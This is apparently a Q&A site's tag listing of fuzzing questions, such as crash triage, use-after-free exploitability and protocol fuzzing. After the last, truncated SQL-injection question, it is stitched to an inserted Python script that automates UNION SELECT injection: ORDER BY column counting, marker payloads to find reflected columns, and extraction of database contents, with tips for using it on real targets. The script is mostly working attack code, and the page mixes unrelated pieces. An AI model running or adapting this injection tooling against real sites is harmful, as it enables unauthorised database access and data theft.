Questions tagged [fuzzing]

Fuzzing is a testing technique that consists of feeding malformed or unexpected data to a program as input, in order to uncover vulnerabilities in how the program handles that input.

100 questions
29 votes, 4 answers

What is the purpose of a fuzzer?

I've heard of these tools and from what I understand, they just send tons of random data at different services and observe their reaction to it. What is the purpose of a fuzzer? How can it be applied during a pentest?
Digital fire (3,126 rep)
19 votes, 3 answers

Black-box fuzzing a TCP port running an unknown application

I'm looking for any guidance around testing a service I've found running on a target server. I'm doing a 'black-box' pen-test and the company is one of those 'I-don't-want-to-tell-you-anything' types so they won't tell us what service is…
NULLZ (11,426 rep)
14 votes, 4 answers

Best way to triage crashes found via fuzzing, on Linux?

When doing fuzz testing, it is easy to end up with many bugs (many crashes). This makes it important to have a way to triage each bug that's detected, so we can prioritize them and focus our effort on the ones that are most likely to represent…
D.W. (98,420 rep)
14 votes, 2 answers

Is a crash always exploitable for RCE?

Reading papers written by teams looking for vulnerabilities using fuzzing, I notice that many people label a crash as a DoS vulnerability. While in other papers and research, they go deeper after the crash and try to exploit it to get RCE. My…
J. Doe (65 rep)
9 votes, 3 answers

Vuln research: reverse engineering, debugging or fuzzing?

I wonder how hackers find vulnerabilities. If they use fuzzing, security engineers do it too, and it's probable that security engineers (who work in a firm) have more resources than a group of hackers. Reverse engineering takes a lot of time, and I…
jaja (91 rep)
9 votes, 1 answer

How many iterations of fuzzing is enough?

Fuzzing is a convenient, relatively low-cost way to detect some kinds of vulnerabilities, particularly in C/C++ code. My question: How much fuzzing is enough? Are there any standards or best practices? Example: Microsoft's SDL requires that…
D.W. (98,420 rep)
9 votes, 1 answer

Is it worth it to fuzz Rust-written software?

If a program is written in C, then it is worth it to fuzz it with something like afl since it might have memory-related bugs. But how about software written in Rust? Would a fuzzer still find bugs? Or are there no memory related bugs that could be…
user164700 (93 rep)
8 votes, 1 answer

Exploitability of use-after-free vulnerabilities

Use-after-free bugs are a particular class of memory safety bugs. How often are they exploitable, in practice? When you find a use-after-free bug in a program, is it often exploitable, rarely exploitable, or does it vary based upon some other…
D.W. (98,420 rep)
8 votes, 1 answer

CERT FOE Fuzzing Framework documentation

So I read another post here about fuzzing local standalone applications. I have understood how to exploit basic buffer overflow vulnerabilities in standalone applications and am now looking on how to find such vulnerabilities. I downloaded the CERT…
user2405966 (97 rep)
8 votes, 3 answers

How to fuzz proprietary protocol over SSL?

I'm doing vulnerability research on a client/server architecture that uses a custom proprietary protocol sent over SSL (port 443). I need to be able to intercept the traffic, and be able to view it in clear-text in something like Wireshark, modify…
eliteparakeet (243 rep)
7 votes, 3 answers

How should I compile program for fuzz testing?

I'm doing some fuzz testing of a program for which I do have source code. Should I compile the program with any particular compiler options, to make fuzz testing more effective? If so, what's the right list of command-line flags to pass to the…
D.W. (98,420 rep)
7 votes, 1 answer

Fuzzing of audio input vectors

A few days ago I had to make a phone call, and on the other end of the line was some machine using voice recognition software to validate the customers' spoken answers to the service menu. I asked myself if it would be possible to fuzz this kind…
Dirk (510 rep)
7 votes, 1 answer

Sulley - optional element and command check

I'm currently using Sulley to fuzz my FTP server, but I'm having problems. I want to specify the STRU command, which has a syntax: STRU [ F|R|P] I tried to specify the optional F,R,P arguments to the STRU command like the…
eleanor (528 rep)
7 votes, 4 answers

What does a common workstation setup look like for pentesting and vulnerability research?

I'm a security enthusiast, and am in need of some guidance to get me into the branch. I've always been held back by lack of methodology in my research, and it tends to break down my motivation towards learning and studying new concepts within the…
6 votes, 1 answer

SQL Injection - UNION SELECT and returning a 'keyword' to find exploitable columns

I have a problem I'm hoping someone could help with regarding the use of UNION SELECT, in a scripted/automated way to find columns that are exploitable (having already found the number of columns using ORDER BY) Doing this manually Using…
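The scripted UNION SELECT procedure the question above asks about, as an added example that is not code from the post. It assumes a numeric (unquoted) injection point and builds its own vulnerable target, a SQLite in-memory database behind a page that concatenates the id into the query and renders only two of the three selected columns, so everything runs offline. The ORDER BY column-count step is included so that the whole procedure sits in one place; the reflected-column step sends a row of unique markers and reports which ones appear in the page.

```python
"""Automating UNION SELECT column discovery against a numeric injection point.

Added example, not code from the original post. The target below is
constructed for the demonstration.
"""
import sqlite3

# ---- constructed vulnerable target ------------------------------------
DB = sqlite3.connect(":memory:", check_same_thread=False)
DB.executescript("""
    CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT, price REAL);
    INSERT INTO products VALUES (1, 'Widget', 'A widget', 9.99), (2, 'Gadget', 'A gadget', 19.99);
""")


def vulnerable_page(product_id: str) -> str:
    """Renders name and price only; description is selected but never shown.
    Deliberately unsafe: the id is concatenated straight into the SQL."""
    sql = f"SELECT name, description, price FROM products WHERE id = {product_id}"
    rows = DB.execute(sql).fetchall()
    return "".join(f'<h1>{name}</h1><span class="price">{price}</span>'
                   for name, _desc, price in rows)


# ---- attacker side -----------------------------------------------------
def find_column_count(fetch, max_cols: int = 32) -> int:
    """Step 1: raise ORDER BY n until the database errors; the last n that
    worked is the column count. On a real target the error shows up as a
    500 page or an error string rather than an exception."""
    for n in range(1, max_cols + 1):
        try:
            fetch(f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count exceeds max_cols")


def find_reflected_columns(fetch, count: int) -> list:
    """Step 2: UNION a row of unique markers and see which come back.
    The leading -1 matches no real row so only the injected row renders."""
    markers = [f"zq{i:02d}zq" for i in range(1, count + 1)]
    payload = "-1 UNION SELECT " + ",".join(f"'{m}'" for m in markers)
    page = fetch(payload)
    return [i for i, m in enumerate(markers, start=1) if m in page]


def extract(fetch, count: int, column: int, expr: str) -> str:
    """Step 3: place a SQL expression in a reflected column (NULL elsewhere),
    wrapped in markers so the value can be cut back out of the HTML."""
    marker = "zqXzq"
    cells = ["NULL"] * count
    cells[column - 1] = f"'{marker}' || ({expr}) || '{marker}'"
    page = fetch("-1 UNION SELECT " + ",".join(cells))
    start = page.index(marker) + len(marker)
    return page[start:page.index(marker, start)]


if __name__ == "__main__":
    n = find_column_count(vulnerable_page)
    cols = find_reflected_columns(vulnerable_page, n)
    print("columns:", n, "reflected:", cols)
    print("tables:", extract(vulnerable_page, n, cols[0],
                             "SELECT group_concat(name) FROM sqlite_master"))
```

If the injection point is inside a quoted string, the same logic applies but each payload needs a closing quote before UNION and a comment marker after it; and if the page only reflects the first row, make sure the original WHERE clause matches nothing (as the -1 does here) so the injected row is the one displayed.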